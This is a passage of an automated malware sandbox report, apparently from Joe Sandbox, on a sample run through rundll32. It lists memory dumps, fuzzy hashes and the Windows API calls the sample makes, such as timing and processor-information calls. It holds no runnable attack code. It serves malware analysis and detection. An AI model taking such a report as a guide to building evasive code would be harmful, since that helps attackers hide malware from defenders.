                          • Instruction Fuzzy Hash: 1AE01A30251C0D9F8A98EF2DA499AA572E0FF18306FD50496D40AC7221D668EEC0871C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 443df9267e74412a07b184f75b86d91aab7e756526931508e130f5b35c1c277b
                          • Instruction ID: 21b00771476c310d3b3212cea6c2461d48f979ab7c82410f2880d4f2ea3c1afb
                          • Opcode Fuzzy Hash: 443df9267e74412a07b184f75b86d91aab7e756526931508e130f5b35c1c277b
                          • Instruction Fuzzy Hash: D1E0EE74908A0C9F8F80EF5CD884AC83BE5FB28394B401116F80EC3200D631E880CB86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5313ac8dcfd6aff18ad436b64c8517226814e4589e6c8eb98e893eb4249e838c
                          • Instruction ID: 1bc81c925e39cc1c392e4084ddf3db8ababac465a92711de055ded577be46b60
                          • Opcode Fuzzy Hash: 5313ac8dcfd6aff18ad436b64c8517226814e4589e6c8eb98e893eb4249e838c
                          • Instruction Fuzzy Hash: DCD0A720715E0B0BFB687AEE1CEE1361080D738206310003B9915D5293E9A8CC46924D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 99b83a47c770425d9ae90f9f09a04ac577e29d810e1bce0e2658993544157e7d
                          • Instruction ID: db1b51f8de84a008fae6f04c56152d193ccf80b0baa5c5af5ffb518aaf69347a
                          • Opcode Fuzzy Hash: 99b83a47c770425d9ae90f9f09a04ac577e29d810e1bce0e2658993544157e7d
                          • Instruction Fuzzy Hash: 37D0A73212180C4BDB50FB95DC856E93369F71C31DF00037BA81DD3061ED659928C6C5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a8abad84e89fafd00ef482df9ce47dd78ff63212f8c6d00b391c14f38ca87fc
                          • Instruction ID: fbf6dc7cf2f035ac79a7dc7cfa65d37a673a90cfe1b89a668309c401817c02ca
                          • Opcode Fuzzy Hash: 9a8abad84e89fafd00ef482df9ce47dd78ff63212f8c6d00b391c14f38ca87fc
                          • Instruction Fuzzy Hash: 82C01210B22A0C079B58B7FE04CA2689090E65820ABA001BFA809D229AEA7A48929304
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e3586106831d5749ebdc5f2d497c5695c542f665bca583d4ac9db92e84bbac6
                          • Instruction ID: 1ed05d76bcfbe8ca552233208a9fcaacfb0212544dfc01b58dfcbfe2ce1027a5
                          • Opcode Fuzzy Hash: 1e3586106831d5749ebdc5f2d497c5695c542f665bca583d4ac9db92e84bbac6
                          • Instruction Fuzzy Hash: C9B0925072AD0C0B5BA8A6FF08EA27490D4D26C01A75010BFA419C63A2E98A48E88345
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95d7bca6358370f43c15ca20916e6e10e2d485463bd7a82c7cc21d450e23b99a
                          • Instruction ID: 6dbb18ffb6dea95a48dc0ba6390b92e5953fa1fa1ba40a97a0cf8891a1431917
                          • Opcode Fuzzy Hash: 95d7bca6358370f43c15ca20916e6e10e2d485463bd7a82c7cc21d450e23b99a
                          • Instruction Fuzzy Hash: B9B09228A66E0A0F8E4C73BE48AE2483991BA49614BC00068A809C3684E53E849C8386
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0cfa698748bb64cedbfea9c0ae8b152c64f619fa36b2ae3542f32198d6df4e9
                          • Instruction ID: 21ac2a481705a99f5833024b097cff2b5eb32e4b948c073529bab5dd0ea454cf
                          • Opcode Fuzzy Hash: a0cfa698748bb64cedbfea9c0ae8b152c64f619fa36b2ae3542f32198d6df4e9
                          • Instruction Fuzzy Hash: B5B09239468EC847CA02B734C94248A72B2FA90B08F800619F48692190ED2D9A2887C6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4d70d8a457702e49553af0b06d2861fee26788a13d9890590d7b15124a35340f
                          • Instruction ID: 07381d3819a749d230f5b594b558cdc9f56c27a7e7240fc86c9ac6beecab002a
                          • Opcode Fuzzy Hash: 4d70d8a457702e49553af0b06d2861fee26788a13d9890590d7b15124a35340f
                          • Instruction Fuzzy Hash: BEA00225C5680947CD1837BA5E8E0843AA0A598615FC54174E805D0554E66E52ED4797
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • Sleep.KERNEL32 ref: 0080F91E
                            • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CAC
                            • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CC5
                          • Sleep.KERNEL32 ref: 0080F98C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .exe$0~$ClassicIE_64$Romania Knives$bucket1$bucket2$bucket3
                          • API String ID: 3472027048-4255013377
                          • Opcode ID: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                          • Instruction ID: 5d250b9ed75b9a8aaf0cfb9770c26032a61d01ab42eb7c904a683a03c819acb6
                          • Opcode Fuzzy Hash: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                          • Instruction Fuzzy Hash: B671CD76210B85D8DB60EF66D8A13D93325F78479CF809026EB4D4BB6ADF78C649C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 0040DFA0: GetCurrentThreadId.KERNEL32 ref: 0040DFA8
                          • GetTickCount.KERNEL32 ref: 0040D9A6
                          • GetTickCount.KERNEL32 ref: 0040D9BF
                          • GetCurrentThreadId.KERNEL32 ref: 0040D9F9
                          • GetTickCount.KERNEL32 ref: 0040DA2C
                          • GetTickCount.KERNEL32 ref: 0040DA65
                          • GetTickCount.KERNEL32 ref: 0040DA93
                          • GetCurrentThreadId.KERNEL32 ref: 0040DB03
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CountTick$CurrentThread
                          • String ID:
                          • API String ID: 3968769311-0
                          • Opcode ID: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                          • Instruction ID: c2a83c2f389e5ad77d80a0aa6aea5129f58ee2ceaede3d7cabad914c36d9a5fa
                          • Opcode Fuzzy Hash: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                          • Instruction Fuzzy Hash: B241D776B0560189DB145EBEC94035B3A60F78C7ACB16513BEE0EE37D4CA39C8898788
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32 ref: 0040D60A
                          • GetProcAddress.KERNEL32 ref: 0040D619
                          • GetLogicalProcessorInformation.KERNEL32 ref: 0040D655
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleInformationLogicalModuleProcProcessor
                          • String ID: GetLogicalProcessorInformation$kernel32.dll
                          • API String ID: 4292003513-812649623
                          • Opcode ID: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                          • Instruction ID: cef72fbf3f936fea3f355e027997f123dbf00725f42591d7e77524adb724cd90
                          • Opcode Fuzzy Hash: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                          • Instruction Fuzzy Hash: 6A213A72A016108DDB54EFB5D58139E3760EB0079CF11242BFA0E27B99DB7AC8C9C788
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: File$View$CloseCreateCurrentHandleMappingProcessUnmap
                          • String ID:
                          • API String ID: 3559396350-0
                          • Opcode ID: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                          • Instruction ID: 8e748d1b53e11ccef3c0eb3844b99e526bf8a27556ab0dbc5ec00e588de23727
                          • Opcode Fuzzy Hash: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                          • Instruction Fuzzy Hash: 05510576201BC0C9EB70EF36D8997DE2761E75578CF80511AEA494BB99CFB8C684C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
